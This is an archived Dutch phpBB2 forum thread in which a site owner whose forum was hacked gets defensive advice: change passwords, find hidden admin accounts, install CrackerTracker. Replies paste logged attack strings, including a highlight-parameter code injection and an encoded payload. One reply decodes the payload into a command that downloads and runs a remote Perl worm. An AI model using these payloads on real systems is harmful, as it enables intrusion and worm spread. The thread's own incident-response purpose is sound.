het voorkomen van hackers ????
Forumregels
Sinds 1 januari 2009 wordt phpBB2 niet meer ondersteund.
Onderstaande informatie is verouderd en dient uitsluitend als archief.
Sinds 1 januari 2009 wordt phpBB2 niet meer ondersteund.
Onderstaande informatie is verouderd en dient uitsluitend als archief.

het voorkomen van hackers ????
hoi,
Mijn forum is laatst gehackt.
De hacker is in mijn adminpanel binnen gedrongen,
waarna hij topics begon te verwijderen en alle users.
Ik kan mn forum nu niet meer binnen. Ik heb het van de server afgehaald.
Hoe kan ik nu voorkomen dat mn forum word gehackt ??
Ik had zelfs de laatste update van phpbb uitgevoerd!
Mijn forum is laatst gehackt.
De hacker is in mijn adminpanel binnen gedrongen,
waarna hij topics begon te verwijderen en alle users.
Ik kan mn forum nu niet meer binnen. Ik heb het van de server afgehaald.
Hoe kan ik nu voorkomen dat mn forum word gehackt ??
Ik had zelfs de laatste update van phpbb uitgevoerd!
-
- Berichten: 64
- Lid geworden op: 16 jul 2005, 20:45
Nooit geen paswoorden doorgeven, zeker niet van ftp programma'sHoe kan ik nu voorkomen dat mn forum word gehackt ??
Nooit premodded files gebruiken, ze zijn onbetrouwbaar (ik zeg niet allemaal, maar meestal toch)
er zijn er genoeg, kijk maar eens op http://www.phphacks.commaar zijn er misschien ook beveiligings mod's
zoek eens in de categorieën, daar moet je er wel tegenkomen.
Dat zal ik niet zeggen voordat iedereen denkt dat ik een hacker benen weten jullie misschien hoe een hacker in de account van een admin komt??


-
- Berichten: 64
- Lid geworden op: 16 jul 2005, 20:45
Een extra beveiliging in de vorm van CrackerTracker van CBack is bij mij een welkome aanvulling gebleken.richard m schreef:maar zijn er misschien ook beveiligings mod's
Regelmatig worden dit soort pogingen gelogd op mijn phpbb 2.0.17 versie:
Code: Selecteer alles
23.08.2005, 15:07 64.203.x.x Mozilla/4.0 p=22365&highlight=\'.system(getenv(http_php)).\'
Nu je weet dat er mensen zijn binnen gekomen, is het zaak alle wachtwoorden te wijzigen. Database, Control Panel, FTP accounts, admin accounts. Daarnaast ga je na of er extra scripts zijn geinstalleerd op je webserver (hier kan je je host ook om vragen) en of er verborgen admin gebruikers zijn (SELECT username FROM phpbb_users WHERE user_level=1;).richard m schreef:Hoe kan ik nu voorkomen dat mn forum word gehackt ??
richard m schreef:maar zijn er misschien ook beveiligings mod's

-
- Berichten: 1496
- Lid geworden op: 25 mei 2005, 14:09
Dat CTRACKER is inderdaad een goed hulpmiddel zeg. Zo had ik gisteren 59 aanvallen in het logbestand staan, en vandaag al 140.
Soms staat er duidelijk "drop table" in de aanval, maar meestal zijn het codes als deze, geen idee wat het betekent.
Soms staat er duidelijk "drop table" in de aanval, maar meestal zijn het codes als deze, geen idee wat het betekent.
Code: Selecteer alles
p=3602&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)
%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)
%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)
%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)%252echr(114)
%252echr(105)%252echr(120)%252echr(105)%252echr(116)%252echr(46)%252echr(99)
%252echr(111)%252echr(109)%252echr(46)%252echr(97)%252echr(117)%252echr(47)
%252echr(112)%252echr(111)%252echr(114)%252echr(116)%252echr(97)%252echr(46)
%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)
%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(111)%252echr(114)
%252echr(116)%252echr(97)%252echr(46)%252echr(116)%252echr(120)%252echr(116))
%252e%2527
Er is overigens ook een hack voor het telkens opnieuw versleutelen van wachtwoorden:
http://www.phpbbhacks.com/download/5586
http://www.phpbbhacks.com/download/5586
Php schreef:Soms staat er duidelijk "drop table" in de aanval, maar meestal zijn het codes als deze, geen idee wat het betekent.
Code: Selecteer alles
system(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)
%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)
%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)
%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)
%252echr(114)%252echr(105)%252echr(120)%252echr(105)%252echr(116)
%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(46)
%252echr(97)%252echr(117)%252echr(47)%252echr(112)%252echr(111)
%252echr(114)%252echr(116)%252echr(97)%252echr(46)%252echr(116)
%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)
%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(111)
%252echr(114)%252echr(116)%252echr(97)%252echr(46)%252echr(116)
%252echr(120)%252echr(116))
Code: Selecteer alles
system('cd /tmp;w get http://rixit.com.au/porta.txt;perl porta.txt')
Wat zoveel betekent als: voer deze shell commando's uit > navigeer naar de temporary directory > download "http://rixit.com.au/porta.txt" en sla deze op in de huidige directory > voer het zojuist gedownloade bestand "porta.txt" uit met de Perl compiler. Het gaat hier dus een worm, welke automatisch de instructies op het genoemde webadres laat uitvoeren en zo een keten van phpbb forums hackt.